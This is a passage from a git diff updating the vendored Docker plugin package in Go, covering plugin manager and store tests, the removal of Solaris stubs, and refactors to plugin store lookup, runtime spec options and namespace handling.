+func (e *simpleExecutor) Signal(id string, signal int) error {
+	return nil
+}
+
+func TestCreateFailed(t *testing.T) {
+	root, err := ioutil.TempDir("", "test-create-failed")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer system.EnsureRemoveAll(root)
+
+	s := NewStore()
+	managerRoot := filepath.Join(root, "manager")
+	p := newTestPlugin(t, "create", "testcreate", managerRoot)
+
+	m, err := NewManager(
+		ManagerConfig{
+			Store:          s,
+			Root:           managerRoot,
+			ExecRoot:       filepath.Join(root, "exec"),
+			CreateExecutor: func(*Manager) (Executor, error) { return &simpleExecutor{}, nil },
+			LogPluginEvent: func(_, _, _ string) {},
+		})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := s.Add(p); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := m.enable(p, &controller{}, false); err == nil {
+		t.Fatalf("expected Create failed error, got %v", err)
+	}
+
+	if err := m.Remove(p.GetID(), &types.PluginRmConfig{ForceRemove: true}); err != nil {
+		t.Fatal(err)
+	}
+}
+
+type executorWithRunning struct {
+	m         *Manager
+	root      string
+	exitChans map[string]chan struct{}
+}
+
+func (e *executorWithRunning) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error {
+	sockAddr := filepath.Join(e.root, id, "plugin.sock")
+	ch := make(chan struct{})
+	if e.exitChans == nil {
+		e.exitChans = make(map[string]chan struct{})
+	}
+	e.exitChans[id] = ch
+	listenTestPlugin(sockAddr, ch)
+	return nil
+}
+
+func (e *executorWithRunning) IsRunning(id string) (bool, error) {
+	return true, nil
+}
+func (e *executorWithRunning) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) {
+	return true, nil
+}
+
+func (e *executorWithRunning) Signal(id string, signal int) error {
+	ch := e.exitChans[id]
+	ch <- struct{}{}
+	<-ch
+	e.m.HandleExitEvent(id)
+	return nil
+}
+
+func TestPluginAlreadyRunningOnStartup(t *testing.T) {
+	t.Parallel()
+
+	root, err := ioutil.TempDir("", t.Name())
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer system.EnsureRemoveAll(root)
+
+	for _, test := range []struct {
+		desc   string
+		config ManagerConfig
+	}{
+		{
+			desc: "live-restore-disabled",
+			config: ManagerConfig{
+				LogPluginEvent: func(_, _, _ string) {},
+			},
+		},
+		{
+			desc: "live-restore-enabled",
+			config: ManagerConfig{
+				LogPluginEvent:     func(_, _, _ string) {},
+				LiveRestoreEnabled: true,
+			},
+		},
+	} {
+		t.Run(test.desc, func(t *testing.T) {
+			config := test.config
+			desc := test.desc
+			t.Parallel()
+
+			p := newTestPlugin(t, desc, desc, config.Root)
+			p.PluginObj.Enabled = true
+
+			// Need a short-ish path here so we don't run into unix socket path length issues.
+			config.ExecRoot, err = ioutil.TempDir("", "plugintest")
+
+			executor := &executorWithRunning{root: config.ExecRoot}
+			config.CreateExecutor = func(m *Manager) (Executor, error) { executor.m = m; return executor, nil }
+
+			if err := executor.Create(p.GetID(), specs.Spec{}, nil, nil); err != nil {
+				t.Fatal(err)
+			}
+
+			root := filepath.Join(root, desc)
+			config.Root = filepath.Join(root, "manager")
+			if err := os.MkdirAll(filepath.Join(config.Root, p.GetID()), 0755); err != nil {
+				t.Fatal(err)
+			}
+
+			if !p.IsEnabled() {
+				t.Fatal("plugin should be enabled")
+			}
+			if err := (&Manager{config: config}).save(p); err != nil {
+				t.Fatal(err)
+			}
+
+			s := NewStore()
+			config.Store = s
+			if err != nil {
+				t.Fatal(err)
+			}
+			defer system.EnsureRemoveAll(config.ExecRoot)
+
+			m, err := NewManager(config)
+			if err != nil {
+				t.Fatal(err)
+			}
+			defer m.Shutdown()
+
+			p = s.GetAll()[p.GetID()] // refresh `p` with what the manager knows
+			if p.Client() == nil {
+				t.Fatal("plugin client should not be nil")
+			}
+		})
+	}
+}
+
+func listenTestPlugin(sockAddr string, exit chan struct{}) (net.Listener, error) {
+	if err := os.MkdirAll(filepath.Dir(sockAddr), 0755); err != nil {
+		return nil, err
+	}
+	l, err := net.Listen("unix", sockAddr)
+	if err != nil {
+		return nil, err
+	}
+	go func() {
+		for {
+			conn, err := l.Accept()
+			if err != nil {
+				return
+			}
+			conn.Close()
+		}
+	}()
+	go func() {
+		<-exit
+		l.Close()
+		os.Remove(sockAddr)
+		exit <- struct{}{}
+	}()
+	return l, nil
+}
diff --git a/vendor/github.com/docker/docker/plugin/manager_solaris.go b/vendor/github.com/docker/docker/plugin/manager_solaris.go
deleted file mode 100644
index 72ccae72d3..0000000000
--- a/vendor/github.com/docker/docker/plugin/manager_solaris.go
+++ /dev/null
@@ -1,28 +0,0 @@
-package plugin
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/plugin/v2"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
-)
-
-func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error {
-	return fmt.Errorf("Not implemented")
-}
-
-func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) {
-	return nil, fmt.Errorf("Not implemented")
-}
-
-func (pm *Manager) disable(p *v2.Plugin, c *controller) error {
-	return fmt.Errorf("Not implemented")
-}
-
-func (pm *Manager) restore(p *v2.Plugin) error {
-	return fmt.Errorf("Not implemented")
-}
-
-// Shutdown plugins
-func (pm *Manager) Shutdown() {
-}
diff --git a/vendor/github.com/docker/docker/plugin/manager_test.go b/vendor/github.com/docker/docker/plugin/manager_test.go
new file mode 100644
index 0000000000..62ccf2149d
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/manager_test.go
@@ -0,0 +1,55 @@
+package plugin // import "github.com/docker/docker/plugin"
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestValidatePrivileges(t *testing.T) {
+	testData := map[string]struct {
+		requiredPrivileges types.PluginPrivileges
+		privileges         types.PluginPrivileges
+		result             bool
+	}{
+		"diff-len": {
+			requiredPrivileges: []types.PluginPrivilege{
+				{Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}},
+			},
+			privileges: []types.PluginPrivilege{
+				{Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}},
+				{Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}},
+			},
+			result: false,
+		},
+		"diff-value": {
+			requiredPrivileges: []types.PluginPrivilege{
+				{Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "GHI"}},
+				{Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "***"}},
+			},
+			privileges: []types.PluginPrivilege{
+				{Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}},
+				{Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}},
+			},
+			result: false,
+		},
+		"diff-order-but-same-value": {
+			requiredPrivileges: []types.PluginPrivilege{
+				{Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "GHI"}},
+				{Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}},
+			},
+			privileges: []types.PluginPrivilege{
+				{Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}},
+				{Name: "Privilege1", Description: "Description", Value: []string{"GHI", "abc", "def"}},
+			},
+			result: true,
+		},
+	}
+
+	for key, data := range testData {
+		err := validatePrivileges(data.requiredPrivileges, data.privileges)
+		if (err == nil) != data.result {
+			t.Fatalf("Test item %s expected result to be %t, got %t", key, data.result, (err == nil))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/plugin/manager_windows.go b/vendor/github.com/docker/docker/plugin/manager_windows.go
index 4469a671f7..90cc52c992 100644
--- a/vendor/github.com/docker/docker/plugin/manager_windows.go
+++ b/vendor/github.com/docker/docker/plugin/manager_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
 	"fmt"
@@ -21,7 +19,7 @@ func (pm *Manager) disable(p *v2.Plugin, c *controller) error {
 	return fmt.Errorf("Not implemented")
 }
 
-func (pm *Manager) restore(p *v2.Plugin) error {
+func (pm *Manager) restore(p *v2.Plugin, c *controller) error {
 	return fmt.Errorf("Not implemented")
 }
 
diff --git a/vendor/github.com/docker/docker/plugin/store.go b/vendor/github.com/docker/docker/plugin/store.go
index b7a96a950a..8e96c11da4 100644
--- a/vendor/github.com/docker/docker/plugin/store.go
+++ b/vendor/github.com/docker/docker/plugin/store.go
@@ -1,42 +1,32 @@
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
 	"fmt"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/plugingetter"
 	"github.com/docker/docker/pkg/plugins"
 	"github.com/docker/docker/plugin/v2"
-	"github.com/docker/docker/reference"
+	"github.com/opencontainers/runtime-spec/specs-go"
 	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 /* allowV1PluginsFallback determines daemon's support for V1 plugins.
  * When the time comes to remove support for V1 plugins, flipping
  * this bool is all that will be needed.
  */
-const allowV1PluginsFallback bool = true
+const allowV1PluginsFallback = true
 
 /* defaultAPIVersion is the version of the plugin API for volume, network,
    IPAM and authz. This is a very stable API. When we update this API, then
-   pluginType should include a version. eg "networkdriver/2.0".
+   pluginType should include a version. e.g. "networkdriver/2.0".
 */
-const defaultAPIVersion string = "1.0"
+const defaultAPIVersion = "1.0"
 
-// ErrNotFound indicates that a plugin was not found locally.
-type ErrNotFound string
-
-func (name ErrNotFound) Error() string { return fmt.Sprintf("plugin %q not found", string(name)) }
-
-// ErrAmbiguous indicates that a plugin was not found locally.
-type ErrAmbiguous string
-
-func (name ErrAmbiguous) Error() string {
-	return fmt.Sprintf("multiple plugins found for %q", string(name))
-}
-
-// GetV2Plugin retreives a plugin by name, id or partial ID.
+// GetV2Plugin retrieves a plugin by name, id or partial ID.
 func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) {
 	ps.RLock()
 	defer ps.RUnlock()
@@ -48,7 +38,7 @@ func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) {
 
 	p, idOk := ps.plugins[id]
 	if !idOk {
-		return nil, errors.WithStack(ErrNotFound(id))
+		return nil, errors.WithStack(errNotFound(id))
 	}
 
 	return p, nil
@@ -58,13 +48,13 @@ func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) {
 func (ps *Store) validateName(name string) error {
 	for _, p := range ps.plugins {
 		if p.Name() == name {
-			return errors.Errorf("plugin %q already exists", name)
+			return alreadyExistsError(name)
 		}
 	}
 	return nil
 }
 
-// GetAll retreives all plugins.
+// GetAll retrieves all plugins.
 func (ps *Store) GetAll() map[string]*v2.Plugin {
 	ps.RLock()
 	defer ps.RUnlock()
@@ -75,6 +65,10 @@ func (ps *Store) GetAll() map[string]*v2.Plugin {
 func (ps *Store) SetAll(plugins map[string]*v2.Plugin) {
 	ps.Lock()
 	defer ps.Unlock()
+
+	for _, p := range plugins {
+		ps.setSpecOpts(p)
+	}
 	ps.plugins = plugins
 }
 
@@ -101,6 +95,22 @@ func (ps *Store) SetState(p *v2.Plugin, state bool) {
 	p.PluginObj.Enabled = state
 }
 
+func (ps *Store) setSpecOpts(p *v2.Plugin) {
+	var specOpts []SpecOpt
+	for _, typ := range p.GetTypes() {
+		opts, ok := ps.specOpts[typ.String()]
+		if ok {
+			specOpts = append(specOpts, opts...)
+		}
+	}
+
+	p.SetSpecOptModifier(func(s *specs.Spec) {
+		for _, o := range specOpts {
+			o(s)
+		}
+	})
+}
+
 // Add adds a plugin to memory and plugindb.
 // An error will be returned if there is a collision.
 func (ps *Store) Add(p *v2.Plugin) error {
@@ -110,6 +120,9 @@ func (ps *Store) Add(p *v2.Plugin) error {
 	if v, exist := ps.plugins[p.GetID()]; exist {
 		return fmt.Errorf("plugin %q has the same ID %s as %q", p.Name(), p.GetID(), v.Name())
 	}
+
+	ps.setSpecOpts(p)
+
 	ps.plugins[p.GetID()] = p
 	return nil
 }
@@ -123,38 +136,40 @@ func (ps *Store) Remove(p *v2.Plugin) {
 
 // Get returns an enabled plugin matching the given name and capability.
 func (ps *Store) Get(name, capability string, mode int) (plugingetter.CompatPlugin, error) {
-	var (
-		p   *v2.Plugin
-		err error
-	)
-
 	// Lookup using new model.
 	if ps != nil {
-		p, err = ps.GetV2Plugin(name)
+		p, err := ps.GetV2Plugin(name)
 		if err == nil {
-			p.AddRefCount(mode)
 			if p.IsEnabled() {
-				return p.FilterByCap(capability)
+				fp, err := p.FilterByCap(capability)
+				if err != nil {
+					return nil, err
+				}
+				p.AddRefCount(mode)
+				return fp, nil
 			}
+
 			// Plugin was found but it is disabled, so we should not fall back to legacy plugins
 			// but we should error out right away
-			return nil, ErrNotFound(name)
+			return nil, errDisabled(name)
 		}
-		if _, ok := errors.Cause(err).(ErrNotFound); !ok {
+		if _, ok := errors.Cause(err).(errNotFound); !ok {
 			return nil, err
 		}
 	}
 
-	// Lookup using legacy model.
-	if allowV1PluginsFallback {
-		p, err := plugins.Get(name, capability)
-		if err != nil {
-			return nil, fmt.Errorf("legacy plugin: %v", err)
-		}
-		return p, nil
+	if !allowV1PluginsFallback {
+		return nil, errNotFound(name)
 	}
 
-	return nil, err
+	p, err := plugins.Get(name, capability)
+	if err == nil {
+		return p, nil
+	}
+	if errors.Cause(err) == plugins.ErrNotFound {
+		return nil, errNotFound(name)
+	}
+	return nil, errors.Wrap(errdefs.System(err), "legacy plugin")
 }
 
 // GetAllManagedPluginsByCap returns a list of managed plugins matching the given capability.
@@ -182,7 +197,7 @@ func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, er
 	if allowV1PluginsFallback {
 		pl, err := plugins.GetAll(capability)
 		if err != nil {
-			return nil, fmt.Errorf("legacy plugin: %v", err)
+			return nil, errors.Wrap(errdefs.System(err), "legacy plugin")
 		}
 		for _, p := range pl {
 			result = append(result, p)
@@ -191,20 +206,24 @@ func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, er
 	return result, nil
 }
 
+func pluginType(cap string) string {
+	return fmt.Sprintf("docker.%s/%s", strings.ToLower(cap), defaultAPIVersion)
+}
+
 // Handle sets a callback for a given capability. It is only used by network
 // and ipam drivers during plugin registration. The callback registers the
 // driver with the subsystem (network, ipam).
 func (ps *Store) Handle(capability string, callback func(string, *plugins.Client)) {
-	pluginType := fmt.Sprintf("docker.%s/%s", strings.ToLower(capability), defaultAPIVersion)
+	typ := pluginType(capability)
 
 	// Register callback with new plugin model.
 	ps.Lock()
-	handlers, ok := ps.handlers[pluginType]
+	handlers, ok := ps.handlers[typ]
 	if !ok {
 		handlers = []func(string, *plugins.Client){}
 	}
 	handlers = append(handlers, callback)
-	ps.handlers[pluginType] = handlers
+	ps.handlers[typ] = handlers
 	ps.Unlock()
 
 	// Register callback with legacy plugin model.
@@ -213,6 +232,15 @@ func (ps *Store) Handle(capability string, callback func(string, *plugins.Client
 	}
 }
 
+// RegisterRuntimeOpt stores a list of SpecOpts for the provided capability.
+// These options are applied to the runtime spec before a plugin is started for the specified capability.
+func (ps *Store) RegisterRuntimeOpt(cap string, opts ...SpecOpt) {
+	ps.Lock()
+	defer ps.Unlock()
+	typ := pluginType(cap)
+	ps.specOpts[typ] = append(ps.specOpts[typ], opts...)
+}
+
 // CallHandler calls the registered callback. It is invoked during plugin enable.
 func (ps *Store) CallHandler(p *v2.Plugin) {
 	for _, typ := range p.GetTypes() {
@@ -230,19 +258,19 @@ func (ps *Store) resolvePluginID(idOrName string) (string, error) {
 		return idOrName, nil
 	}
 
-	ref, err := reference.ParseNamed(idOrName)
+	ref, err := reference.ParseNormalizedNamed(idOrName)
 	if err != nil {
-		return "", errors.WithStack(ErrNotFound(idOrName))
+		return "", errors.WithStack(errNotFound(idOrName))
 	}
 	if _, ok := ref.(reference.Canonical); ok {
-		logrus.Warnf("canonical references cannot be resolved: %v", ref.String())
-		return "", errors.WithStack(ErrNotFound(idOrName))
+		logrus.Warnf("canonical references cannot be resolved: %v", reference.FamiliarString(ref))
+		return "", errors.WithStack(errNotFound(idOrName))
 	}
 
-	fullRef := reference.WithDefaultTag(ref)
+	ref = reference.TagNameOnly(ref)
 
 	for _, p := range ps.plugins {
-		if p.PluginObj.Name == fullRef.String() {
+		if p.PluginObj.Name == reference.FamiliarString(ref) {
 			return p.PluginObj.ID, nil
 		}
 	}
@@ -251,13 +279,13 @@ func (ps *Store) resolvePluginID(idOrName string) (string, error) {
 	for id, p := range ps.plugins { // this can be optimized
 		if strings.HasPrefix(id, idOrName) {
 			if found != nil {
-				return "", errors.WithStack(ErrAmbiguous(idOrName))
+				return "", errors.WithStack(errAmbiguous(idOrName))
 			}
 			found = p
 		}
 	}
 	if found == nil {
-		return "", errors.WithStack(ErrNotFound(idOrName))
+		return "", errors.WithStack(errNotFound(idOrName))
 	}
 	return found.PluginObj.ID, nil
 }
diff --git a/vendor/github.com/docker/docker/plugin/store_test.go b/vendor/github.com/docker/docker/plugin/store_test.go
index 6b1f6a9418..14b484f76c 100644
--- a/vendor/github.com/docker/docker/plugin/store_test.go
+++ b/vendor/github.com/docker/docker/plugin/store_test.go
@@ -1,16 +1,17 @@
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/plugingetter"
 	"github.com/docker/docker/plugin/v2"
 )
 
 func TestFilterByCapNeg(t *testing.T) {
 	p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}}
-	iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"}
-	i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}}
+	iType := types.PluginInterfaceType{Capability: "volumedriver", Prefix: "docker", Version: "1.0"}
+	i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}}
 	p.PluginObj.Config.Interface = i
 
 	_, err := p.FilterByCap("foobar")
@@ -22,8 +23,8 @@ func TestFilterByCapNeg(t *testing.T) {
 func TestFilterByCapPos(t *testing.T) {
 	p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}}
 
-	iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"}
-	i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}}
+	iType := types.PluginInterfaceType{Capability: "volumedriver", Prefix: "docker", Version: "1.0"}
+	i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}}
 	p.PluginObj.Config.Interface = i
 
 	_, err := p.FilterByCap("volumedriver")
@@ -31,3 +32,33 @@ func TestFilterByCapPos(t *testing.T) {
 		t.Fatalf("expected no error, got %v", err)
 	}
 }
+
+func TestStoreGetPluginNotMatchCapRefs(t *testing.T) {
+	s := NewStore()
+	p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}}
+
+	iType := types.PluginInterfaceType{Capability: "whatever", Prefix: "docker", Version: "1.0"}
+	i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}}
+	p.PluginObj.Config.Interface = i
+
+	if err := s.Add(&p); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := s.Get("test", "volumedriver", plugingetter.Acquire); err == nil {
+		t.Fatal("exepcted error when getting plugin that doesn't match the passed in capability")
+	}
+
+	if refs := p.GetRefCount(); refs != 0 {
+		t.Fatalf("reference count should be 0, got: %d", refs)
+	}
+
+	p.PluginObj.Enabled = true
+	if _, err := s.Get("test", "volumedriver", plugingetter.Acquire); err == nil {
+		t.Fatal("exepcted error when getting plugin that doesn't match the passed in capability")
+	}
+
+	if refs := p.GetRefCount(); refs != 0 {
+		t.Fatalf("reference count should be 0, got: %d", refs)
+	}
+}
diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin.go b/vendor/github.com/docker/docker/plugin/v2/plugin.go
index 93b489a14b..6852511c5e 100644
--- a/vendor/github.com/docker/docker/plugin/v2/plugin.go
+++ b/vendor/github.com/docker/docker/plugin/v2/plugin.go
@@ -1,27 +1,36 @@
-package v2
+package v2 // import "github.com/docker/docker/plugin/v2"
 
 import (
 	"fmt"
+	"net"
+	"path/filepath"
 	"strings"
 	"sync"
+	"time"
 
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/pkg/plugingetter"
 	"github.com/docker/docker/pkg/plugins"
+	"github.com/opencontainers/go-digest"
+	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
 // Plugin represents an individual plugin.
 type Plugin struct {
-	mu              sync.RWMutex
-	PluginObj       types.Plugin `json:"plugin"` // todo: embed struct
-	pClient         *plugins.Client
-	refCount        int
-	PropagatedMount string // TODO: make private
-	Rootfs          string // TODO: make private
+	mu        sync.RWMutex
+	PluginObj types.Plugin `json:"plugin"` // todo: embed struct
+	pClient   *plugins.Client
+	refCount  int
+	Rootfs    string // TODO: make private
 
 	Config   digest.Digest
 	Blobsums []digest.Digest
+
+	modifyRuntimeSpec func(*specs.Spec)
+
+	SwarmServiceID string
+	timeout        time.Duration
+	addr           net.Addr
 }
 
 const defaultPluginRuntimeDestination = "/run/docker/plugins"
@@ -35,13 +44,17 @@ func (e ErrInadequateCapability) Error() string {
 	return fmt.Sprintf("plugin does not provide %q capability", e.cap)
 }
 
-// BasePath returns the path to which all paths returned by the plugin are relative to.
-// For Plugin objects this returns the host path of the plugin container's rootfs.
-func (p *Plugin) BasePath() string {
-	return p.Rootfs
+// ScopedPath returns the path scoped to the plugin rootfs
+func (p *Plugin) ScopedPath(s string) string {
+	if p.PluginObj.Config.PropagatedMount != "" && strings.HasPrefix(s, p.PluginObj.Config.PropagatedMount) {
+		// re-scope to the propagated mount path on the host
+		return filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount", strings.TrimPrefix(s, p.PluginObj.Config.PropagatedMount))
+	}
+	return filepath.Join(p.Rootfs, s)
 }
 
 // Client returns the plugin client.
+// Deprecated: use p.Addr() and manually create the client
 func (p *Plugin) Client() *plugins.Client {
 	p.mu.RLock()
 	defer p.mu.RUnlock()
@@ -50,6 +63,7 @@ func (p *Plugin) Client() *plugins.Client {
 }
 
 // SetPClient set the plugin client.
+// Deprecated: Hardcoded plugin client is deprecated
 func (p *Plugin) SetPClient(client *plugins.Client) {
 	p.mu.Lock()
 	defer p.mu.Unlock()
@@ -140,6 +154,9 @@ next:
 				}
 
 				// it is, so lets update the settings in memory
+				if mount.Source == nil {
+					return fmt.Errorf("Plugin config has no mount source")
+				}
 				*mount.Source = s.value
 				continue next
 			}
@@ -157,6 +174,9 @@ next:
 				}
 
 				// it is, so lets update the settings in memory
+				if device.Path == nil {
+					return fmt.Errorf("Plugin config has no device path")
+				}
 				*device.Path = s.value
 				continue next
 			}
@@ -233,12 +253,59 @@ func (p *Plugin) AddRefCount(count int) {
 // Acquire increments the plugin's reference count
 // This should be followed up by `Release()` when the plugin is no longer in use.
 func (p *Plugin) Acquire() {
-	p.AddRefCount(plugingetter.ACQUIRE)
+	p.AddRefCount(plugingetter.Acquire)
 }
 
 // Release decrements the plugin's reference count
 // This should only be called when the plugin is no longer in use, e.g. with
-// via `Acquire()` or getter.Get("name", "type", plugingetter.ACQUIRE)
+// via `Acquire()` or getter.Get("name", "type", plugingetter.Acquire)
 func (p *Plugin) Release() {
-	p.AddRefCount(plugingetter.RELEASE)
+	p.AddRefCount(plugingetter.Release)
+}
+
+// SetSpecOptModifier sets the function to use to modify the generated
+// runtime spec.
+func (p *Plugin) SetSpecOptModifier(f func(*specs.Spec)) {
+	p.mu.Lock()
+	p.modifyRuntimeSpec = f
+	p.mu.Unlock()
+}
+
+// Timeout gets the currently configured connection timeout.
+// This should be used when dialing the plugin.
+func (p *Plugin) Timeout() time.Duration {
+	p.mu.RLock()
+	t := p.timeout
+	p.mu.RUnlock()
+	return t
+}
+
+// SetTimeout sets the timeout to use for dialing.
+func (p *Plugin) SetTimeout(t time.Duration) {
+	p.mu.Lock()
+	p.timeout = t
+	p.mu.Unlock()
+}
+
+// Addr returns the net.Addr to use to connect to the plugin socket
+func (p *Plugin) Addr() net.Addr {
+	p.mu.RLock()
+	addr := p.addr
+	p.mu.RUnlock()
+	return addr
+}
+
+// SetAddr sets the plugin address which can be used for dialing the plugin.
+func (p *Plugin) SetAddr(addr net.Addr) {
+	p.mu.Lock()
+	p.addr = addr
+	p.mu.Unlock()
+}
+
+// Protocol is the protocol that should be used for interacting with the plugin.
+func (p *Plugin) Protocol() string {
+	if p.PluginObj.Config.Interface.ProtocolScheme != "" {
+		return p.PluginObj.Config.Interface.ProtocolScheme
+	}
+	return plugins.ProtocolSchemeHTTPV1
 }
diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go
index e980e7f29a..58c432fcd6 100644
--- a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go
+++ b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go
@@ -1,23 +1,23 @@
-// +build linux
-
-package v2
+package v2 // import "github.com/docker/docker/plugin/v2"
 
 import (
 	"os"
 	"path/filepath"
+	"runtime"
 	"strings"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/oci"
 	"github.com/docker/docker/pkg/system"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/opencontainers/runtime-spec/specs-go"
 	"github.com/pkg/errors"
 )
 
 // InitSpec creates an OCI spec from the plugin's config.
 func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
 	s := oci.DefaultSpec()
-	s.Root = specs.Root{
+
+	s.Root = &specs.Root{
 		Path:     p.Rootfs,
 		Readonly: false, // TODO: all plugins should be readonly? settable in config?
 	}
@@ -32,6 +32,17 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
 		return nil, errors.WithStack(err)
 	}
 
+	if p.PluginObj.Config.PropagatedMount != "" {
+		pRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount")
+		s.Mounts = append(s.Mounts, specs.Mount{
+			Source:      pRoot,
+			Destination: p.PluginObj.Config.PropagatedMount,
+			Type:        "bind",
+			Options:     []string{"rbind", "rw", "rshared"},
+		})
+		s.Linux.RootfsPropagation = "rshared"
+	}
+
 	mounts := append(p.PluginObj.Config.Mounts, types.PluginMount{
 		Source:      &execRoot,
 		Destination: defaultPluginRuntimeDestination,
@@ -42,7 +53,7 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
 	if p.PluginObj.Config.Network.Type != "" {
 		// TODO: if net == bridge, use libnetwork controller to create a new plugin-specific bridge, bind mount /etc/hosts and /etc/resolv.conf look at the docker code (allocateNetwork, initialize)
 		if p.PluginObj.Config.Network.Type == "host" {
-			oci.RemoveNamespace(&s, specs.NamespaceType("network"))
+			oci.RemoveNamespace(&s, specs.LinuxNamespaceType("network"))
 		}
 		etcHosts := "/etc/hosts"
 		resolvConf := "/etc/resolv.conf"
@@ -60,6 +71,13 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
 				Options:     []string{"rbind", "ro"},
 			})
 	}
+	if p.PluginObj.Config.PidHost {
+		oci.RemoveNamespace(&s, specs.LinuxNamespaceType("pid"))
+	}
+
+	if p.PluginObj.Config.IpcHost {
+		oci.RemoveNamespace(&s, specs.LinuxNamespaceType("ipc"))
+	}
 
 	for _, mnt := range mounts {
 		m := specs.Mount{
@@ -82,14 +100,8 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
 		}
 	}
 
-	if p.PluginObj.Config.PropagatedMount != "" {
-		p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount)
-		s.Linux.RootfsPropagation = "rshared"
-	}
-
 	if p.PluginObj.Config.Linux.AllowAllDevices {
-		rwm := "rwm"
-		s.Linux.Resources.Devices = []specs.DeviceCgroup{{Allow: true, Access: &rwm}}
+		s.Linux.Resources.Devices = []specs.LinuxDeviceCgroup{{Allow: true, Access: "rwm"}}
 	}
 	for _, dev := range p.PluginObj.Settings.Devices {
 		path := *dev.Path
@@ -102,7 +114,7 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
 	}
 
 	envs := make([]string, 1, len(p.PluginObj.Settings.Env)+1)
-	envs[0] = "PATH=" + system.DefaultPathEnv
+	envs[0] = "PATH=" + system.DefaultPathEnv(runtime.GOOS)
 	envs = append(envs, p.PluginObj.Settings.Env...)
 
 	args := append(p.PluginObj.Config.Entrypoint, p.PluginObj.Settings.Args...)
@@ -115,7 +127,15 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
 	s.Process.Cwd = cwd
 	s.Process.Env = envs
 
-	s.Process.Capabilities = append(s.Process.Capabilities, p.PluginObj.Config.Linux.Capabilities...)
+	caps := s.Process.Capabilities
+	caps.Bounding = append(caps.Bounding, p.PluginObj.Config.Linux.Capabilities...)
+	caps.Permitted = append(caps.Permitted, p.PluginObj.Config.Linux.Capabilities...)
+	caps.Inheritable = append(caps.Inheritable, p.PluginObj.Config.Linux.Capabilities...)
+	caps.Effective = append(caps.Effective, p.PluginObj.Config.Linux.Capabilities...)
+
+	if p.modifyRuntimeSpec != nil {
+		p.modifyRuntimeSpec(&s)
+	}
 
 	return &s, nil
 }
diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go
index e60fb8311e..5242fe124c 100644
--- a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go
+++ b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go
@@ -1,11 +1,11 @@
 // +build !linux
 
-package v2
+package v2 // import "github.com/docker/docker/plugin/v2"
 
 import (
 	"errors"
 
